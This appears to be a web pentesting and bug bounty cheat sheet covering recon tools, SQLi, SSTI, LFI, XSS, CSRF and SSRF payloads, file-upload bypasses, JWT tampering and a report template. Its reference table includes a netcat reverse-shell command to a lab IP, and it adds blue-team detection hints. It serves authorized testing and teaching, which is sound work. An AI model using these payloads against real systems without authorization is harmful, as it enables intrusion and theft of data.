Web Exploitation & Bug Bounty Tactics
Web Exploitation & Bug Bounty Tactics — Recon, Exploit, Automate, Report
🧠 For authorized testing, bug bounty programs, and educational labs. This guide unifies web pentesting, CTF web exploitation, and real bug bounty workflows — from target reconnaissance to report-ready exploitation.
I. 🌍 Reconnaissance Phase
🔹 1. Passive Recon
Identify scope and subdomains without touching the target.
assetfinder example.com subfinder -d example.com -all amass enum -passive -d example.com crt.sh/?q=%.example.comEnumerate DNS, WHOIS, and ASN:
whois example.com dig any example.com dnsenum example.com
🔹 2. Active Recon
Resolve live hosts:
httprobe < subdomains.txt > alive.txt httpx -l alive.txt -sc -title -tech-detect -status-codeIdentify tech stack:
whatweb https://target.com wappalyzer-cli https://target.comScreenshot endpoints (for triage):
gowitness file -f alive.txt
🔹 3. Directory & Endpoint Discovery
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,204,301,302,307,403dirsearch -u https://target.com -e php,aspx,js,txt🧠 Pro tip: Focus on hidden admin panels, backup files, and APIs — that’s where CTF flags and bounties hide.
II. 💉 Injection Vulnerabilities
SQL Injection
' OR 1=1--
Test login forms, parameters
Blind SQLi
1' AND SLEEP(5)--
Time-based testing
Command Injection
; id # or && whoami
Test upload, ping, diagnostic pages
File Inclusion
../../../../etc/passwd
LFI, RFI, php://filter tricks
Template Injection (SSTI)
{{7*7}}, ${{7*7}}
Jinja2, Twig, or Java frameworks
XXE Injection
Custom XML payloads
Extract /etc/passwd, SSRF via XML
Deserialization
pickle.loads() / ObjectInputStream
Identify serialized input fields
🧠 Always inspect request parameters, headers, and hidden form fields.
III. 🔐 Authentication & Access Control
🔹 Common Flaws
Default creds →
/admin:adminWeak tokens / predictable session IDs
Missing logout or session expiry
JWT manipulation (
nonealg / base64 tampering)Password reset token reuse
🔹 Testing
jwt_tool token.jwt -d
jwt_tool token.jwt -S hs256 -p secretwfuzz -c -z file,users.txt -z file,pass.txt -u https://target/login -d "username=FUZZ&password=FUZ2Z"IV. ⚙️ File Upload Vulnerabilities
Basic Upload
Upload .php renamed as .png
Look for double extensions
Bypass filters
shell.pHp, shell.php%00.jpg
Null-byte or case bypass
Client-side only checks
Modify via Burp Repeater
JS validation bypass
Image Polyglot
JPEG + PHP payload
Exploit misconfigured interpreters
🧠 Common Upload Paths
/uploads/
/images/
/files/
/user_content/→ Try accessing uploaded files directly.
V. 🌐 Client-Side Attacks
🔹 Cross-Site Scripting (XSS)
Reflected
<script>alert(1)</script>
Stored
Comment fields, message boxes
DOM-based
#<img src=x onerror=alert(1)>
CSP Bypass
<svg onload=alert(1)>, JSONP callback injections
💡 Automate scanning:
dalfox file urls.txt -b your.xss.report🔹 CSRF (Cross-Site Request Forgery)
Check for missing CSRF tokens.
Try auto-submit forms:
<form action="https://target/change_password" method="POST">
<input type="hidden" name="password" value="pwned">
<script>document.forms[0].submit()</script>
</form>🔹 Open Redirects
Test parameters like redirect=, next=, url=:
https://target.com/login?redirect=https://evil.comVI. 🧱 Server-Side Exploits
SSRF
url=http://127.0.0.1:8080/admin
Access internal services
File Inclusion
page=../../../../etc/passwd
LFI/RFI
XXE
Inject XML with external entity
File read / SSRF
Deserialization
pickle.loads / php unserialize
RCE
🧠 Always pair SSRF + local admin portal + metadata service = internal RCE (CTF classic).
VII. 🧰 Automation & Toolchains
Burp Suite / OWASP ZAP
Manual web proxy & fuzzing
ffuf / gobuster / dirsearch
Directory and param brute-forcing
httpx / nuclei
Automated tech & vuln scanning
sqlmap
SQLi automation
x8 / dalfox
XSS detection
nuclei templates
Reusable vulnerability signatures
arjun
Hidden parameter discovery
wfuzz
Parameter fuzzing
jwt_tool / jwt-cracker
Token tampering
whatweb / wappalyzer
Tech stack enumeration
🧠 Integrate with bash pipelines:
subfinder -d target.com | httpx -silent | nuclei -t vulnerabilities/VIII. 🧩 API & Mobile Backends
Excessive Data Exposure
/api/v1/users returns full objects
Mass Assignment
JSON injection → add admin=true
Broken Auth
Missing tokens or session validation
Rate Limiting
Test 429 / lockout behavior
GraphQL
{"query":"{__schema{types{name}}}"} for introspection
Tools: Postman, Insomnia, Burp, graphqlmap.
IX. 🧠 Bug Bounty Methodology
Recon
amass, subfinder, httpx
Live targets
Automation
ffuf, nuclei
Vulnerable endpoints
Manual testing
Burp / browser
Proof of Concept
Validation
Screenshot, payload confirmation
Reproducible exploit
Reporting
Clear writeup
Reward-worthy report
🧩 Always include:
Target URL & request details
Impact summary
Step-by-step reproduction
Fix recommendation
X. 🧠 Reporting Template
Title: Reflected XSS on example.com in login.php
Severity: High
Description:
The login page parameter `redirect` is vulnerable to XSS allowing arbitrary JavaScript execution.
Steps to Reproduce:
1. Navigate to:
https://example.com/login?redirect=javascript:alert(1)
2. Observe the alert pop-up.
Impact:
An attacker can steal session cookies or perform actions on behalf of users.
Recommendation:
Sanitize input, enforce strict allowlist, implement CSP.
Proof of Concept:
<insert screenshot or video>XI. ⚙️ Cheat Reference Table
SQLi
' OR '1'='1'--
Command Injection
; nc -e /bin/sh 10.10.14.2 4444
LFI
../../../../etc/passwd
SSTI
{{7*7}}
XSS
<svg onload=alert(1)>
SSRF
http://127.0.0.1:8080/admin
Deserialization
PHP: O:1:"A":1:{s:1:"b";s:3:"pwn";}
XII. 🔒 Blue-Team / Detection Hints
SQLi
IDS/IPS regex on ' OR, UNION SELECT
XSS
WAF HTML entity escaping
SSRF
Logs showing 169.254.x.x / localhost requests
File Upload
MIME mismatch / signature mismatch alerts
Command Injection
bash, curl, wget in logs
CSRF
Missing CSRF tokens flagged by scanners
JWT Abuse
Invalid token reuse detection
XIII. 🧰 Quick Automation Script (Recon → Scan)
domain=example.com
subfinder -d $domain -o subs.txt
httpx -l subs.txt -silent -o live.txt
nuclei -l live.txt -t cves/ -o findings.txtLast updated
Was this helpful?